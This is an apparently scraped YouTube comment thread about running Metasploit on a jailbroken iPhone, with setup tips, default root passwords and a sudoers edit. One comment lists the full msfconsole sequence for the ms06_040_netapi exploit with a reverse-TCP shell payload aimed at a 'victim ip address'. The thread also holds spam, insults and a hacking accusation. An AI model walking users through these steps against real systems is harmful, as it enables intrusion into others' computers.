you need a jailbroken iphone with cydia. Download "Metasploit" from the cydia repository. You probably need cydia installed as hacker or developer for Metasploit to show up
Can you tell me exactly what commands you typed to do this? Is there a plugin for the terminal app to get all these commands? Because when I open up terminal none of the commands you've shown are in there.
As far as the commands in Mobile Terminal. If you tap the signal bars on the menu bar when in Mobile Terminal, it will take you to the preferences options. The menu option is where you can add your own custom Mobile Terminal shortcuts. This is where I added shortcuts for specific commands, so I didn't have to type them out on the crappy iphone virtual keyboard. I'd check this link for more Mobile Terminal usage tips:
If you use the pwnage tool, your default root password will be either "alpine" or "dottie" (depends on the version of pwnage you use). You should definitely change this password.
Also, the regular user you login as is "mobile"... so when you open terminal, you are the "mobile" user. If you want to use sudo (to run things like metasploit) you need to add the mobile user to the sudoer's file. To do this, ssh to the iPhone, and use vi or some editor to edit /etc/sudoers. For instance, you can add this line:
mobile ALL=(ALL) ALL
(it's a copy of root)
Then, if you run "sudo msfconsole" at terminal, it should work... there are caveats.
1) It starts WAY slow.... I speed this up in the video to save time... but ruby on the iphone is not fast.. it can take about a minute to load msfconsole
2) FREE RAM IS IMPORTANT: Recently, my copy of Metasploit on the iphone stopped loaded... and would just crash... as it turned out, I had installed way too many cydia app that are resident in memory... on average, I only had around 10-15 MB of ram free... not enough for msfconsole, apparently. I first started uninstalling alot of stuff, but I eventually had to re-jailbreak and start from scratch...
so if you're the type of person that likes to load all kinds of apps... you might want to download on that shows how much RAM you have free.. if you don't have enough, don't be suprised if running msfconsole crashes the terminal.
The key is, you need to jailbreak your iphone first. Use the Pwnage tool (or winpwn for windows users). Once you jailbreak your iphone, it installs an Cydia, which is a package installation program. Cydia already has the repository for the Metasploit package. Just search cydia for Metasploit, and install it (It's pretty big compared to other iphone packages). You'll also need to install mobile terminal and sudo to get metasploit working properly.
ok thanks for the information but i already have all this i just need to get metasploit get to work on the terminal cause i saw the guy putting a code and i dont know the code he put on
My ex wife hacked my computer and stole my pictures and music.All thanks to this she is a bitch!!!
wachter206 1 month ago
@Crabydude uh.... i am
ajbutch123 9 months ago
its people like you that scare the shit outto me.
it's people like me who know more about this shit than you do and can protect myself from people like you
ajbutch123 9 months ago
tell me this guy isent high....
Magaman8910 10 months ago
fuck you
daduucozcom 1 year ago
you need a jailbroken iphone with cydia. Download "Metasploit" from the cydia repository. You probably need cydia installed as hacker or developer for Metasploit to show up
CoreyNachDIR 1 year ago
@CoreyNachDIR no need for ruby?
FroggEnigma 1 year ago
what program need to be here doing this in iphone
burja8 1 year ago
Computer nerd
Toonakes 1 year ago
can u tell me what dis does?
technodj13 1 year ago
I didn't get one shit wat u said
hussein807 2 years ago
-
-
-
how do i know which is the right session?
pd: is there any problem if i do this on my own computer ?
-
-
-
pepegodines2 2 years ago
what is the password for msfconsole?? how do i get it??
matthew2029 2 years ago
what is the password to run msfconsole?? what password do i need and where do i get it from??
matthew2029 2 years ago
@matthew2029 if u use sudo then yea..!! that is to run as root and password is usually by default 'alpine'
crzren 1 year ago
iPhone zu teuer?
Ich zeig euch wie Ihr bei rewardmix ganz einfach 100% kostenlos an ein iPhone oder andere Dinge kommt!
Einfach mein Video anschauen...
watch?v=BMb7BRsbA6c
All4Free99 2 years ago
Can you tell me exactly what commands you typed to do this? Is there a plugin for the terminal app to get all these commands? Because when I open up terminal none of the commands you've shown are in there.
jarvista 2 years ago
Jarvista,
They are basic Metasploit CLI commands. I'd check out a MFS CLI tutorial for more details. Anyway, here are the specifics:
1) sudo msfconsole
2) use windows/smb/ms06_040_netapi <-- you can replace with any exploit
3) set PAYLOAD windows/shell_reverse_tcp <-- you can replace with any payload
4) set LHOST [attacker ip address]
5) set RHOST [victim ip address]
6) exploit
7) sessions -i 1 <-- replace with right session
That's it. Pretty simple.
CoreyNachDIR 2 years ago
As far as the commands in Mobile Terminal. If you tap the signal bars on the menu bar when in Mobile Terminal, it will take you to the preferences options. The menu option is where you can add your own custom Mobile Terminal shortcuts. This is where I added shortcuts for specific commands, so I didn't have to type them out on the crappy iphone virtual keyboard. I'd check this link for more Mobile Terminal usage tips:
CoreyNachDIR 2 years ago
what is the program your using to show the iphone on your computer
12345678910JJ 2 years ago
VNC. Specifically, "Veency", which is Saurik's VNC package in cydia. Very easy to use.
CoreyNachDIR 2 years ago
how do you find out your password?
Jarhead020 3 years ago
Sorry I don't reply often.
If you use the pwnage tool, your default root password will be either "alpine" or "dottie" (depends on the version of pwnage you use). You should definitely change this password.
CoreyNachDIR 2 years ago
Also, the regular user you login as is "mobile"... so when you open terminal, you are the "mobile" user. If you want to use sudo (to run things like metasploit) you need to add the mobile user to the sudoer's file. To do this, ssh to the iPhone, and use vi or some editor to edit /etc/sudoers. For instance, you can add this line:
mobile ALL=(ALL) ALL
(it's a copy of root)
Then, if you run "sudo msfconsole" at terminal, it should work... there are caveats.
CoreyNachDIR 2 years ago
1) It starts WAY slow.... I speed this up in the video to save time... but ruby on the iphone is not fast.. it can take about a minute to load msfconsole
CoreyNachDIR 2 years ago
2) FREE RAM IS IMPORTANT: Recently, my copy of Metasploit on the iphone stopped loaded... and would just crash... as it turned out, I had installed way too many cydia app that are resident in memory... on average, I only had around 10-15 MB of ram free... not enough for msfconsole, apparently. I first started uninstalling alot of stuff, but I eventually had to re-jailbreak and start from scratch...
CoreyNachDIR 2 years ago
so if you're the type of person that likes to load all kinds of apps... you might want to download on that shows how much RAM you have free.. if you don't have enough, don't be suprised if running msfconsole crashes the terminal.
CoreyNachDIR 2 years ago
anybody got metasploit running on their iPhone here without any problems??
melchisalins 3 years ago
damn that a nice hack does it work on a jailbroken ipod touch 1g on fw 2.1
sausageboy14 3 years ago
does anyone know how i can get metasploit on the iphone?
MIAMIHACKER 3 years ago
Cydia.
Louix94 3 years ago
The key is, you need to jailbreak your iphone first. Use the Pwnage tool (or winpwn for windows users). Once you jailbreak your iphone, it installs an Cydia, which is a package installation program. Cydia already has the repository for the Metasploit package. Just search cydia for Metasploit, and install it (It's pretty big compared to other iphone packages). You'll also need to install mobile terminal and sudo to get metasploit working properly.
CoreyNachDIR 3 years ago
ok thanks for the information but i already have all this i just need to get metasploit get to work on the terminal cause i saw the guy putting a code and i dont know the code he put on
MIAMIHACKER 3 years ago
Nice vid...
rachelrose86 3 years ago
rofl ... u rock
KrochaDavid 3 years ago